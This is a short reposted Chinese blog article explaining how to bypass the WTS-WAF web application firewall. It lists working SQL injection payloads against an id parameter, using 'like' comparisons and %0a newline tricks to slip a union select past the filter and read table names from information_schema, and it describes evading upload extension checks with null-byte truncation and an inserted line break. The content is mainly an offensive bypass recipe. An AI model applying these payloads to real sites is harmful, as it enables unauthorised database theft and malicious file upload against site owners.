码上快乐

相关内容   简体   繁体

bypass WTS-WAF(sql注入+文件上传)

本文转载自  查看原文  2020-08-19 10:35  1029 

sql注入

注入点:?id=13

payload:

?id=13'+and+'1'='1--+  拦截

 

 

 ?id=13'+and+1+like+1--+  不拦截,正常回显

 ?id=13'+and+1+like+2--+  不拦截,回显异常  判断存在注入

?id=-13' union select--%0a1,2,3,4,5,(select--%0atable_name from information_schema.tables where table_schema="数据库名" limit 2,1)--  继续注入

文件上传

 

 上面是上传后的文件名,使用00截断,下面是WTS-WAF检测的文件名,可以通过在后面的双引号前面换行来绕过后缀名检测

 


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



猜您在找 记一次过WTS-WAF注入 WAF绕过之sql注入bypass 过waf实战之文件上传bypass总结 Bypass ngx_lua_waf SQL注入防御(多姿势) Bypass X-WAF SQL注入防御(多姿势) SQL注入bypass学习 SQL注入及bypass思路(1) [11期]绕过安全狗、云锁等各大WAF注入,上传深入自动化Bypass攻击 SQL注入之waf绕过 sql注入之堆叠注入及waf绕过注入
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM